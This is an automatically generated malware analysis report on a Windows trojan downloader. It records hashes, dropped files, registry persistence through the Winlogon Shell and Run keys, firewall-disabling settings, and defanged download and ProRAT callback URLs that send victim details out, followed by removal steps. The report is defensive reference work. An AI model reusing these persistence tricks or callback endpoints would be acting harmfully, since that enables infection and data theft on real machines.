Trojan.Win32.Bumat_fc4d522d01
Trojan.Generic.69468 (BitDefender), TrojanDownloader:Win32/Delf.ZA (Microsoft), Trojan-Downloader.Win32.Agent.fne (Kaspersky), Trojan.DownLoader.65461 (DrWeb), probably a variant of Win32/TrojanDownloader.Agent (NOD32), Generic Downloader.x (McAfee), Downloader (Symantec), Trojan-Dropper.Agent (Ikarus), Trojan.Generic.69468 (FSecure), Downloader.Agent.VXG (AVG), Win32:Agent-QQF (Avast), TROJ_Generic.DIM (TrendMicro), Trojan.Win32.Bumat.FD, mzpefinder_pcap_file.YR, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-Downloader, Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: fc4d522d0194718df37ab9a324d3cb71
SHA1: a292fa44012843f67baf3ca582a2ebc3be695b29
SHA256: fe4fe2ef3a7c5a49fdded586629493ce5d002a27ced2b349a5d99dfaee96c4f9
SSDeep: 192:nDjtjvfnJis+pvN9ItoiElyKeOn66peo5Ta8I4mzg5B:d7fX+5mKeOLeo5Ta8WSB
Size: 13839 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: GreatSoft
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net1.exe:736
net1.exe:1376
%original file name%.exe:456
NET.exe:1816
NET.exe:204
fservice.exe:1360
coco1.exe:1812
HelpMe.exe:516
The Trojan injects its code into the following process(es):
No processes have been created.
File activity
The process fservice.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
The Trojan deletes the following file(s):
%System%\fservice.exe (0 bytes)
%WinDir%\system\sservice.exe (0 bytes)
The process coco1.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\HelpMe.exe (3262 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF215A.tmp (0 bytes)
%System%\HelpMe.exe (0 bytes)
The process HelpMe.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\HelpMe.exe.bat (101 bytes)
%System%\fservice.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
Registry activity
The process net1.exe:736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 79 F1 0F 7B 6A 3C 0B 17 BA BF F3 F0 A0 D3 63"
The process net1.exe:1376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 65 8F D8 02 61 22 4B 84 03 BF 25 16 33 A2 3A"
The process %original file name%.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6F 19 62 DD 06 0C 7A C2 7C 81 AF 80 C0 64 3E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"coco1.exe" = "coco1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process NET.exe:1816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE B7 87 85 E1 D9 96 3E E9 8D 85 47 53 1D 6F A8"
The process NET.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 33 DF BD 7C DC 54 9D 3D 8A CD 20 92 3D 40 90"
The process fservice.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 DD 30 7F 8F F0 68 9C 52 E4 C3 A0 1D AF 4E C8"
The process coco1.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 36 08 FF 63 E3 83 09 5D 90 83 B8 C0 0C 40 D7"
The process HelpMe.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 2C D1 DC EC DF 97 32 DA 87 D2 9A 5C 62 6D B8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "%System%\fservice.exe"
[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = ""
"LanNotifie" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "%WinDir%\system\sservice.exe"
[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = ""
"Port" = "4001"
"Sifre" = "032547"
"Mail" = "us`ihlnAx`inn/gs"
"ICQ_UIN2" = ""
"FW_KILL" = "1"
"Online_List" = "iuuq;..us`ihld/ushqne/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe"
Network activity (URLs)
| URL | IP |
|---|---|
| hxxp://212.27.63.106/coco1.exe | |
| hxxp://trahime.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=XP_&ipadresi=192.168.1.129&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=2:51:34_AM&servertarihi=2/17/2014&serversifre=123456&islem=log | |
| mx-eu.mail.am0.yahoodns.net | |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net1.exe:736
net1.exe:1376
%original file name%.exe:456
NET.exe:1816
NET.exe:204
fservice.exe:1360
coco1.exe:1812
HelpMe.exe:516
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
%System%\HelpMe.exe (3262 bytes)
%System%\HelpMe.exe.bat (101 bytes)
%System%\fservice.exe (2105 bytes)
- Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.